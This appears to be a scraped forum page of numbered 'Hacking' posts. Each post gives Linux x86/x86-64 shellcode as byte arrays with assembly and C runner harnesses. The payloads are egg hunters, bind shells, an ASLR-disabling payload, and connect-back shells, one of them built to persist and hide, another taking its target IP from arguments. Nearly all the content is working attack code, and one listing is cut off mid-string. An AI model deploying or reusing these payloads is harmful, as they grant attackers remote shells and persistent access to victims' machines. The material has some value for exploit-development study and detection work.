    /** Copyright © 2017 Odzhan. All Rights Reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ; 38 byte Egg Hunter using sys_access() for x86-64 Linux ; bits 64 xor edi, edi ; rdi = 0 mul edi ; rax = 0, rdx = 0 xchg eax, esi ; rsi = F_OK mov dh, 10h ; rdx = 4096 nxt_page: add rdi, rdx ; advance 4096 bytes nxt_addr: push rdi ; save page address add rdi, 8 ; try read 8 bytes ahead push 21 pop rax ; rax = sys_access syscall pop rdi ; restore rdi cmp al, 0xF2 ; -EFAULT means bad address je nxt_page ; keep going until good read ; put your own signature here mov eax, 0xDEADC0DE scasd jne nxt_addr scasd jne nxt_addr jmp rdi ; jump into shellcode */ #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/mman.h> #define EGG64_SIZE 38 char EGG64[] = { /* 0000 */ "\x31\xff" /* xor edi, edi */ /* 0002 */ "\xf7\xe7" /* mul edi */ /* 0004 */ "\x96" /* xchg esi, eax */ /* 0005 */ "\xb6\x10" /* mov dh, 0x10 */ /* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */ /* 000A */ "\x57" /* push rdi */ /* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */ /* 000F */ "\x6a\x15" /* push 0x15 */ /* 0011 */ "\x58" /* pop rax */ /* 0012 */ "\x0f\x05" /* syscall */ /* 0014 */ "\x5f" /* pop rdi */ /* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */ /* 0017 */ "\x74\xee" /* jz 0x7 */ /* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */ /* 001E */ "\xaf" /* scasd */ /* 001F */ "\x75\xe9" /* jnz 0xa */ /* 0021 */ "\xaf" /* scasd */ /* 0022 */ "\x75\xe6" /* jnz 0xa */ /* 0024 */ "\xff\xe7" /* jmp rdi */ }; // sig is 0xDEADC0DE #define EGG_SIG "\xDE\xC0\xAD\xDE" // 71 byte bind shell for x86-64 Linux. // listens on 0.0.0.0:1234 // // port offset is 0x010 // char BS[] = { EGG_SIG EGG_SIG /* 0000 */ "\x6a\x29" /* push 0x29 */ /* 0002 */ "\x58" /* pop rax */ /* 0003 */ "\x6a\x01" /* push 0x1 */ /* 0005 */ "\x5e" /* pop rsi */ /* 0006 */ "\x6a\x02" /* push 0x2 */ /* 0008 */ "\x5f" /* pop rdi */ /* 0009 */ "\x99" /* cdq */ /* 000A */ "\x0f\x05" /* syscall */ /* 000C */ "\x97" /* xchg edi, eax */ /* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */ /* 0012 */ "\xfe\xc7" /* inc bh */ /* 0014 */ "\x53" /* push rbx */ /* 0015 */ "\x54" /* push rsp */ /* 0016 */ "\x5e" /* pop rsi */ /* 0017 */ "\xb2\x10" /* mov dl, 0x10 */ /* 0019 */ "\xb0\x31" /* mov al, 0x31 */ /* 001B */ "\x0f\x05" /* syscall */ /* 001D */ "\x31\xf6" /* xor esi, esi */ /* 001F */ "\xb0\x32" /* mov al, 0x32 */ /* 0021 */ "\x0f\x05" /* syscall */ /* 0023 */ "\xb0\x2b" /* mov al, 0x2b */ /* 0025 */ "\x0f\x05" /* syscall */ /* 0027 */ "\x97" /* xchg edi, eax */ /* 0028 */ "\x96" /* xchg esi, eax */ /* 0029 */ "\xb0\x21" /* mov al, 0x21 */ /* 002B */ "\x0f\x05" /* syscall */ /* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */ /* 0030 */ "\x79\xf7" /* jns 0x29 */ /* 0032 */ "\x31\xf6" /* xor esi, esi */ /* 0034 */ "\x50" /* push rax */ /* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */ /* 003F */ "\x51" /* push rcx */ /* 0040 */ "\x54" /* push rsp */ /* 0041 */ "\x5f" /* pop rdi */ /* 0042 */ "\x99" /* cdq */ /* 0043 */ "\xb0\x3b" /* mov al, 0x3b */ /* 0045 */ "\x0f\x05" /* syscall */ }; void xcode(char *s, int len) { uint8_t *p; p=(uint8_t*)mmap (0, len, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); memcpy(p, s, len); // execute ((void(*)())p)(); munmap ((void*)p, len); } int main(int argc, char *argv[]) { uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS), PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); if (sc != NULL) { memcpy (sc, BS, sizeof(BS)); xcode (EGG64, EGG64_SIZE); munmap((void*)sc, sizeof(BS)); } return 0; }
  20. Hacking

    /* ;Title: x64 Linux egghunter in 24 bytes ;Author: David Velázquez a.k.a d4sh&r ;Contact: https://mx.linkedin.com/in/d4v1dvc ;Description: x64 Linux egghunter that looks for the string "[email protected]@ck" ; and then execute the shellcode ;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux ;Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm ; ld -o egghunter egghunter.o ;SLAE64-1379 global _start _start: pop rax ; some address in the stack search: inc rax cmp [rax - 4] , dword 0x6b634068 ; "[email protected]" jnz search cmp [rax - 8] , dword 0x6b634068 ; "[email protected]" jnz search call rax ; execute shellcode */ #include<stdio.h> #include<string.h> //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode unsigned char hunter[] = "\x58\x48\xff\xc0\x81\x78\xfc\x68\x40\x63\x6b\x75\xf4\x81\x78\xf8\x68\x40\x63\x6b\x75\xeb\xff\xd0"; unsigned char egg[] = \ "\x68\x40\x63\x6b" //egg "\x68\x40\x63\x6b" //egg "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x0$ int main() { printf("Hunter Length: %d\n", (int)strlen(hunter)); (*(void (*)()) hunter)(); }
  21. Hacking

    /*--------------------------------------------------------------------------------------------------------------------- /* *Title: x86_64 Linux egghunter in 18 bytes *Author: Sathish kumar *Contact: https://www.linkedin.com/in/sathish94 *Description: x86_64 linux egghunter which searches for the marker. *Copyright: (c) 2016 iQube. (http://iQube.io) *Release Date: January 7, 2016 *Tested On: Ubuntu 14.04 LTS *SLAE64-1408 *Build/Run: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter * *Nasm source: * * global _start _start: egg: inc rdx ; Address push rdx ; pushing the value in the rdx to the stack pop rdi ; sending rdx to rdi via stack push 0x50905090 ; pusing the egg marker into the stack pop rax inc eax ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded scasd ; check if we have found the egg jnz egg ; try the next byte in the memory jmp rdi ; go to the shellcode *Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm ld -o egghunter egghunter.o */ #include <stdio.h> #include <string.h> char hunter[] = \ "\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7"; char execve_code_with_egg[] = \ //marker "\x91\x50\x90\x50" "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; int main(){ printf("Egg Hunter Length: %d\n", (int)strlen(hunter)); (*(void (*)()) hunter)(); return 0; }
  22. Hacking

    /* Title: Linux/x86-64 - Disable ASLR Security - 143 bytes Date: 2010-06-17 Tested: Archlinux x86_64 k2.6.33 Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ Description: ============ Address space layout randomization (ASLR) is a computer security technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space. This shellcode disables the ASLR. */ #include <stdio.h> char *SC = /* open("/proc/sys/kernel/randomize_va_space", O_WRONLY|O_CREAT|O_APPEND, 0644) */ "\x48\x31\xd2" // xor %rdx,%rdx "\x48\xbb\xff\xff\xff\xff\xff\x61\x63\x65" // mov $0x656361ffffffffff,%rbx "\x48\xc1\xeb\x28" // shr $0x28,%rbx "\x53" // push %rbx "\x48\xbb\x7a\x65\x5f\x76\x61\x5f\x73\x70" // mov $0x70735f61765f657a,%rbx "\x53" // push %rbx "\x48\xbb\x2f\x72\x61\x6e\x64\x6f\x6d\x69" // mov $0x696d6f646e61722f,%rbx "\x53" // push %rbx "\x48\xbb\x73\x2f\x6b\x65\x72\x6e\x65\x6c" // mov $0x6c656e72656b2f73,%rbx "\x53" // push %rbx "\x48\xbb\x2f\x70\x72\x6f\x63\x2f\x73\x79" // mov $0x79732f636f72702f,%rbx "\x53" // push %rbx "\x48\x89\xe7" // mov %rsp,%rdi "\x66\xbe\x41\x04" // mov $0x441,%si "\x66\xba\xa4\x01" // mov $0x1a4,%dx "\x48\x31\xc0" // xor %rax,%rax "\xb0\x02" // mov $0x2,%al "\x0f\x05" // syscall /* write(3, "0\n", 2) */ "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" // mov $0x3ffffffffffffff,%rdi "\x48\xc1\xef\x38" // shr $0x38,%rdi "\x48\xbb\xff\xff\xff\xff\xff\xff\x30\x0a" // mov $0xa30ffffffffffff,%rbx "\x48\xc1\xeb\x30" // shr $0x30,%rbx "\x53" // push %rbx "\x48\x89\xe6" // mov %rsp,%rsi "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x02" // mov $0x2ffffffffffffff,%rdx "\x48\xc1\xea\x38" // shr $0x38,%rdx "\x48\x31\xc0" // xor %rax,%rax "\xb0\x01" // mov $0x1,%al "\x0f\x05" // syscall /* _exit(0) */ "\x48\x31\xff" // xor %rdi,%rdi "\x48\x31\xc0" // xor %rax,%rax "\xb0\x3c" // mov $0x3c,%al "\x0f\x05"; // syscall int main(void) { fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; }
  23. Hacking

    /* #Title: connect back shellcode that splits from the process it was injected into, and then stays persistent and difficult to remove. It is also very close to invisible due to some interesting effects created by forking, and calling the rdtsc instruction #length: 139 bytes #Date: 14 September 2014 #Author: Aaron Yool (aka: MadMouse) #tested On: Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux */ /* ; ; part of my shellcode for noobs lesson series hosted in #goatzzz on irc.enigmagroup.org ; ; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp ; ; part of my shellcode for noobs lesson series hosted in #goatzzz on irc.enigmagroup.org ; ; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp [bits 32] section .text global _start _start: ; fork(void); xor eax,eax ; cleanup after rdtsc xor edx,edx ; .... xor ebx,ebx ; cleanup the rest xor ecx,ecx ; .... mov al,0x02 int 0x80 cmp eax,1 ; if this is a child, or we have failed to clone jl fork ; jump to the main code jmp exit fork: ; socket(AF_INET, SOCK_STREAM, 0); push eax push byte 0x1 ; SOCK_STREAM push byte 0x2 ; AF_INET mov al, 0x66 ; sys_socketcall mov bl,0x1 ; sys_socket mov ecx,esp int 0x80 ; dup2(s,i); mov ebx,eax ; s xor ecx,ecx loop: mov al,0x3f ; sys_dup2 int 0x80 inc ecx cmp ecx,4 jne loop ; connect(s, (sockaddr *) &addr,0x10); push 0x0101017f ; IP = 127.1.1.1 push word 0x391b ; PORT = 6969 push word 0x2 ; AF_INET mov ecx,esp push byte 0x10 push ecx ;pointer to arguments push ebx ; s -> standard out/in mov ecx,esp mov al,0x66 int 0x80 xor ecx,ecx sub eax,ecx jnz cleanup ; cleanup and start over ; fork(void); mov al,0x02 int 0x80 cmp eax,1 ; if this is a child, or we have failed to clone jl client ; jump to the shell xor eax,eax push eax jmp cleanup ; cleanup and start over client: ; execve(SHELLPATH,{SHELLPATH,0},0); mov al,0x0b jmp short sh load_sh: pop esi push edx ; 0 push esi mov ecx,esp mov ebx,esi int 0x80 cleanup: ; close(%ebx) xor eax,eax mov al,0x6 int 0x80 pause rdtsc pause jmp _start exit: ; exit(0); xor eax,eax mov al,0x1 xor ebx,ebx int 0x80 sh: call load_sh db "/bin/bash" */ const char evil[] = "\x31\xc0\x31\xd2\x31\xdb\x31\xc9\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x02\xeb\x62\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x04\x75\xf6\x68\x7f\x01\x01\x01\x66\x68\x1b\x39\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x29\xc8\x75\x1b\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x05\x31\xc0\x50\xeb\x0d\xb0\x0b\xeb\x1f\x5e\x52\x56\x89\xe1\x89\xf3\xcd\x80\x31\xc0\xb0\x06\xcd\x80\xf3\x90\x0f\x31\xf3\x90\xeb\x8b\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; typedef void (*shellcode)(void); void main(void) { ((shellcode)evil)(); }
  24. Hacking

    #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <limits.h> /* usual rant here.. this is just a doodle.. i was curious about the amd64 and since i dont think a simple exec /bin/sh is worth releasing i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stelth because it contains the bullshit feature that /bin/bash isnt /easily/ noticable this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints if you might say "but..phar.. linux has 32 bit compatability.. and i can just use existing shellcode" to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatability.. i checked.. its there... i promise" im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited by hand if needed.. (dont forget to invert) bpp.etherdyne.net www.stonedcoder.org phar[at]stonedcoder[dot]org */ char sc_raw[] = "\x48\x31\xd2" // xor %rdx,%rdx "\x6a\x01" // pushq $0x1 "\x5e" // pop %rsi "\x6a\x02" // pushq $0x2 "\x5f" // pop %rdi "\x6a\x29" // pushq $0x29 "\x58" // pop %rax "\x0f\x05" // syscall #socket "\x48\x97" // xchg %rax,%rdi #in_sockaddr, rax does equal 2 but i think i can get away with this "\x50" // push %rax "\x48\xb9\x00\x00\x00\x00\x11" // mov $0x4141414141414141,%rcx "\x11\xff\xfd" "\x48\xf7\xd1" // not %rcx "\x51" // push %rcx "\x48\x89\xe6" // mov %rsp,%rsi "\x6a\x10" // pushq $0x10 "\x5a" // pop %rdx "\x6a\x2a" // pushq $0x2a "\x58" // pop %rax "\x0f\x05" // syscall #connect "\x6a\x03" // pushq $0x3 "\x5e" // pop %rsi //dup_loop: "\x6a\x21" // pushq $0x21 "\x58" // pop %rax "\x48\xff\xce" // dec %rsi "\x0f\x05" // syscall #dup2 "\x75\xf6" // jne 4004c5 <dup_loop> "\x48\xbb\xd0\x9d\x96\x91\xd0" // mov $0xff978cd091969dd0,%rbx "\x8c\x97\xff" "\x48\xf7\xd3" // not %rbx "\x53" // push %rbx "\x48\x89\xe7" // mov %rsp,%rdi "\x48\x31\xc0" // xor %rax,%rax "\x50" // push %rax "\x57" // push %rdi "\x48\x89\xe6" // mov %rsp,%rsi "\x48\x31\xd2" // xor %rdx,%rdx "\xb0\x3b" // mov $0x3b,%al "\x0f\x05" // syscall #exec ; #define HOSTOFFSET 19 #define PORTOFFSET 23 void scprint(char * foo, int len); void usage(); void (*shellcode)() = sc_raw; main(int argc, char *argv[]){ uint32 host; uint16 port; if(argc != 3){ //i'll only do so much to save you from stupidity usage(); exit(1); } host =~ (int)inet_addr(argv[1]); port =~ htons(atoi(argv[2])); memcpy(&sc_raw[HOSTOFFSET],&host,4); memcpy(&sc_raw[PORTOFFSET],&port,2); scprint(sc_raw,sizeof(sc_raw)); shellcode(); } void scprint(char * foo, int len){ int i; printf("char shellcode[]=\""); for(i = 0; i < len; i++){ printf("\\x%02x",(char)foo[i]&0xff); } printf("\";\n"); fflush(stdout); } void usage(){ printf("./%s [<ip address.. and i mean ip address>] [<port number>]\n\n"); }
  25. Hacking

    #include <stdio.h> #include <string.h> // Exploit Title: [NetCat Bind Shell 64bit 64byte] // Date: [6/28/2016] // Exploit Author: [CripSlick] // Tested on: [Kali 2.0] // Version: [v1.10-41] // [email protected] // OffSec ID: OS-20614 // Victim: netstat -an | grep LISTEN | grep tcp // Attacker: nc <victim_IP> <port> unsigned char code[] = \ #define PORT "\x39\x39" // Keep to two bytes "\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05" ; int main () { // I make sure there are no nulls // The string count will terminate at the first \x00 printf("The Shellcode is %d Bytes Long\n", strlen(code)); // Next I throw 0xAAAAAAAA into every register before shellcode execution // This ensures that the shellcode will run in any circumstance __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" "call code"); return 0; }
×